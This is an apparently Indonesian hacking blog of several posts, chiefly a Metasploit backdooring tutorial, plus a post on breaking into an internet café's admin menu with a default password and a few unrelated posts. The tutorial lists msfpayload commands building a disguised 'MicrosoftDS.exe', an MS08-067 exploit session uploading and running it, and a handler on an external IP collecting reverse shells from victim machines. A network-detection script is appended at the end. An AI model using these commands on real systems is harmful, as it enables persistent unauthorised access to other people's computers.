Fooling around at the internet café? BeX + ArtiConet DSL Router

Posted by fitri-ariyanto on Sunday, November 17, 2013

[A Quick Story]

The night before the election I didn't know what to do with myself, so in the end I decided to go to an internet café (warnet). Hmm, there was a new warnet as well, and I wanted to try it out.. in the end it would be hunting for tutorials and chatting as usual.. hehe.. understandable, there isn't much on my mind yet.. I don't even have a girlfriend (haha, oversharing here… hehe :) )

I don't know why, but this warnet was still quiet: only 2 clients, and I was the third. While logging in as a personal user (why do I always want to know about its security..?) this silly idea came up, as it always does every time I go to a warnet, hehe..


[go to freak]

Hehe, funny title.. what does it mean? Even I don't know.. I just wrote whatever..

OK, straight to it,

1. When you are about to enter a username for the personal login, first check whether there is an Admin menu. If there is, we may be able to check whether the default password has been changed or not.. :)

Choose the Admin menu and enter the password 008. Ta-da… and it just disappears again? Well, that means the admin is fairly decent and the password has already been changed. If you're lucky, you'll get this screen instead…

-------------------------

Let's just censor it… :) I didn't have time, and the desktop probably couldn't be captured anyway… :) There are lots of client settings available if you can get into the Admin menu. Enable the Windows tools (Task Manager, Cmd, Regedit, Control Panel, etc.); most warnets disable these tools, and I guess I was just lucky to get in.. hehe :). Once you're done with that, exit the Admin menu and log in as personal. Let's check the other parts..

2. Login succeeded. Want to carry on browsing or chatting? Go ahead… hehe, but the point of this tutorial is to act like a security observer of sorts.. hehe, not that I am one…

As it happens, I had already enabled all the Windows menus/tools earlier, so for those who have got that far: open the command prompt… a.k.a. CMD :)

We want to find out the router's IP address… just use the Tracert command to keep it simple (in my opinion, anyway.. no hating :) ..)

See the picture for an example..
Wow... you can see there that we traced yahoo.com, and the trace passes through IP address 192.168.1.1, hehe, so there's the router.. Now open a browser (Mozilla, Opera, or whatever) and enter that IP address.. This is what I got:


Oops… there it is, you can see it, right..? hehe.. hmmm, what if we planted a Trojan there…? Hehe, so we could get in freely some day… heh (but would that even work….?)
Feel free to experiment on your own…

[Conclusion]

There are plenty of points and conclusions to take from this write-up. For those of you who want to open a warnet business, don't underestimate the things that laypeople like me may not know about.. :) especially the security of the network, and also the security of the client PCs. You're lucky if you get users who don't know much about computers yet, or newbies (like me..), but if you get a reckless client? Your warnet could be wrecked.. If you're the one trying this out, don't mess with someone else's business: call the admin and tell them if something is wrong with their security…

[Extra]

To those who are already masters, just one note.. this is a newbie's write-up, so sorry if it's old news. :) I only wanted to share. Besides, I'd like to run a warnet myself.. hehehe

[Closing]

Thanks to:
Warnet xxxxxx near Papyros (my favourite place to play PS2)
Thanks for letting me test on you.. :) next time, don't end up with a user like me.. hehehe…
Special:
Allah SWT, for His blessings, and Rasulullah SAW.
SiNus Solo, class of 2007
xcode, echo, jasakom, etc.
And all of you who took the time to read this.

Here's that FBI Firefox Exploit for You (CVE-2013-1690)

Posted by fitri-ariyanto

Hello fellow hackers,

I hope you guys had a blast at Defcon partying it up and hacking all the things, because ready or not, here's more work for you.  During the second day of the conference, I noticed a reddit post regarding some Mozilla Firefox 0day possibly being used by the FBI in order to identify some users using Tor for crackdown on child pornography. The security community was amazing: within hours, we found more information such as brief analysis about the payload, simplified PoC, bug report on Mozilla, etc. The same day, I flew back to the Metasploit hideout (with Juan already there), and we started playing catch-up on the vulnerability.



Closing the Book

Posted by fitri-ariyanto on Friday, May 21, 2010

Sorry, everyone: for the time being this blog will probably not be updated. Apologies if this is inconvenient.. thank you to everyone who has been willing to comment and to offer criticism, suggestions and ideas.

In the meantime, the blog that is being updated is http://usersonly.wordpress.com


Regards,
xiNux3r

Earthquakes and the Qur'an

Posted by fitri-ariyanto on Friday, October 02, 2009

It is deeply moving when we look more closely at the disasters that keep striking this country. It would be good for us to start learning and understanding the meaning behind all this. O Allah, grant us protection from all punishment and torment, and guide us to Your path, O Allah. The straight path, the path of those on whom Allah has bestowed favour, and not the path of those who have gone astray. Awaken us and this country, O Allah.

It happened at 17.16 WIB.. try opening the Qur'an, surah 17, verse 16,
namely
Al-Isra verse 16: "And if We intend to destroy a land, We command those who live in luxury in that land (to obey Allah), but they commit disobedience in that land, so the word (Our decree) rightly takes effect against it, and then We destroy that land utterly."

Then there was an aftershock at 17.38;
just look at Al-Isra surah 38: "The evil of all that is deeply hated in the sight of your Lord."

In Jambi the earthquake was at 8.52 WIB,
and the content of surah al-Anfal verse 52 (QS 8:52) is: "(Their condition) is like that of Pharaoh and his followers and those before them. They denied the signs of Allah, so Allah punished them for their sins. Indeed, Allah is Most Strong and severe in His punishment."

Allah tried to remind us.......... Subhanallah
May these signs make us better Muslims.. amen


Backdooring with Metasploit

Posted by fitri-ariyanto on Monday, May 11, 2009

Some of you may already know that Metasploit can be used to create a backdoor.
Such a backdoor is very useful, especially as a post-exploitation method. In this example we will use the two basic methods of getting a shell from the target, namely bind_tcp and reverse_tcp.
With bind_tcp, the backdoor running on the target opens a port on the target system itself, so that once the exploitation process is complete we can get back into the target at any time through the port the backdoor has opened.


$ ./msfpayload windows/meterpreter/bind_tcp LPORT=4321 RHOST=10.10.96.143 EXITFUNC=thread X > MicrosoftDS.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/bind_tcp
Length: 307
Options: LPORT=4321,RHOST=10.10.96.143,EXITFUNC=thread


The backdoor will open port 4321 on the target 10.10.96.143. As for how the backdoor gets to run: it can be planted and executed once exploitation of the target is complete, as follows:


msf exploit(ms08_067_netapi) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 0 / 1 - lang:English
[*] Selected Target: Windows XP SP0/SP1 Universal
[*] Triggering the vulnerability...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 3 opened (10.10.97.14:31338 -> 10.10.96.143:4780)

meterpreter > cd \
meterpreter > pwd
C:\
meterpreter > upload MicrosoftDS.exe
[*] uploading : MicrosoftDS.exe -> MicrosoftDS.exe
[*] uploaded : MicrosoftDS.exe -> MicrosoftDS.exe
meterpreter > execute -f MicrosoftDS.exe -H
Process 2348 created.


Afterwards, we can get into the target machine without exploiting it again, simply by opening a connection to the port that was defined earlier.


msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(handler) > set LPORT 4321
LPORT => 4321
msf exploit(handler) > set RHOST 10.10.96.143
RHOST => 10.10.96.143
msf exploit(handler) > exploit

[*] Starting the payload handler...
[*] Started bind handler
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 2 opened (10.10.97.14:58798 -> 10.10.96.143:4321)

meterpreter >



The second method uses a reverse shell. A reverse shell is used especially when the target network is restricted by a firewall, so that we cannot open a connection to any port on it (typical of an internal network). So if you get the chance to hack a machine on an internal network (e.g. a school computer, office computer, internet café computer, etc.) and still want shell access at any time and from anywhere, you can use the multi-handler to accept the Metasploit reverse shell. The multi-handler can be set up on a machine that is reachable from anywhere on the internet, for example a hosting machine, or a looted server, etc.


msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > show options

Module options:

Name  Current Setting  Required  Description
----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  seh              yes       Exit technique: seh, thread, process
LHOST                      yes       The local address
LPORT     4444             yes       The local port


Exploit target:

Id  Name
--  ----
0   Wildcard Target


msf exploit(handler) > set LPORT 53
LPORT => 53
msf exploit(handler) > set LHOST 222.124.199.76
LHOST => 222.124.199.76
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler..


Then create a backdoor of the reverse shell category:


$ ./msfpayload windows/meterpreter/reverse_tcp LPORT=53 LHOST=222.124.199.76 EXITFUNC=thread X > MicrosoftDS.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 278
Options: LPORT=53,LHOST=222.124.199.76,EXITFUNC=thread
$ file MicrosoftDS.exe
MicrosoftDS.exe: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit


And when it is run (through the post-exploitation session, or manually with a double-click of the mouse), the multi-handler will show:


[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 3 opened (222.124.199.76:53 -> 10.10.96.143:4831)

meterpreter >


Wow, with Metasploit's multi-handler we can have multiple sessions at once. In the example above, the multi-handler with ExitOnSession set to false can handle many reverse shells at once, and we can interact with those sessions at any time we want:


msf exploit(handler) > sessions -l

Active sessions
===============

Id  Description  Tunnel
--  -----------  ------
3   Meterpreter  222.124.199.76:53 -> 10.10.96.146:4831
4   Meterpreter  222.124.199.76:53 -> 10.10.96.223:4836
5   Meterpreter  222.124.199.76:53 -> 10.10.96.215:4838
6   Meterpreter  222.124.199.76:53 -> 172.16.96.143:4840
7   Meterpreter  222.124.199.76:53 -> 172.16.96.143:4845
8   Meterpreter  222.124.199.76:53 -> 172.16.96.143:4846
9   Meterpreter  222.124.199.76:53 -> 172.16.96.143:4847

msf exploit(handler) > sessions -i 3
[*] Starting interaction with 3...
meterpreter > sysinfo
Computer: PROGWAR
OS : Windows XP (Build 2600, ).


Those are a few examples of using Metasploit for backdooring; there are many other creative examples for kiddies, especially ones that smack of evil-in-mind. Oh yes, in the examples above I used the meterpreter payload many times. Meterpreter itself will be discussed next.
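
Seen from the network side, both patterns in this post leave a recognisable trace: the reverse payload is a workstation opening TCP/53 to a host that is not its DNS resolver, and the bind payload is an inbound connection to a workstation port nobody expects to be listening. The following detection sketch is an added example, not part of the original post; the record layout, the resolver and port allow-lists, the subnet and all sample addresses are constructed assumptions.

```python
import ipaddress
from collections import defaultdict

# Assumptions (not from the original post): record layout, allow-lists and
# subnet are constructed for illustration. Each record is one connection,
# written initiator first: "src_ip src_port dst_ip dst_port proto".
APPROVED_RESOLVERS = {"10.10.96.1"}
WORKSTATIONS = ipaddress.ip_network("10.10.96.0/24")
ALLOWED_INBOUND_PORTS = {3389}

# Constructed sample flow records (documentation address ranges for externals).
SAMPLE_FLOWS = """\
10.10.96.143 4831 203.0.113.76 53 tcp
10.10.96.146 4836 203.0.113.76 53 tcp
10.10.96.150 1037 10.10.96.1 53 udp
10.10.96.150 1040 198.51.100.10 80 tcp
10.10.97.14 58798 10.10.96.143 4321 tcp
10.10.97.14 31338 10.10.96.143 3389 tcp
"""

def parse_flows(text):
    """Yield (src, sport, dst, dport, proto) from whitespace-separated lines."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue  # skip malformed records rather than guessing
        src, sport, dst, dport, proto = parts
        yield (ipaddress.ip_address(src), int(sport),
               ipaddress.ip_address(dst), int(dport), proto.lower())

def find_suspicious(text):
    """Return (alerts, fan_in): alert strings, and workstations per TCP/53 destination."""
    alerts, fan_in = [], defaultdict(set)
    for src, sport, dst, dport, proto in parse_flows(text):
        # Reverse-connect pattern: workstation opens TCP/53 to a non-resolver.
        if (src in WORKSTATIONS and proto == "tcp" and dport == 53
                and str(dst) not in APPROVED_RESOLVERS):
            fan_in[str(dst)].add(str(src))
            alerts.append(f"tcp53-non-resolver {src} -> {dst}")
        # Bind-listener pattern: inbound TCP to a workstation port off the allow-list.
        elif dst in WORKSTATIONS and proto == "tcp" and dport not in ALLOWED_INBOUND_PORTS:
            alerts.append(f"unexpected-listener {dst}:{dport} from {src}")
    return alerts, {d: sorted(s) for d, s in fan_in.items()}

if __name__ == "__main__":
    alerts, fan_in = find_suspicious(SAMPLE_FLOWS)
    print("\n".join(alerts))
    for dst, hosts in fan_in.items():
        print(f"{dst} receives TCP/53 from {len(hosts)} workstation(s): {hosts}")
```

Several workstations converging on one external TCP/53 destination, as in the session list above, is a stronger signal than any single flow; an egress rule that allows DNS only to the approved resolvers removes the channel altogether.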
-----
Thanks to:
echo, xcode, jasakom, mildnet, newhack etc..

copyleft@echo.or.id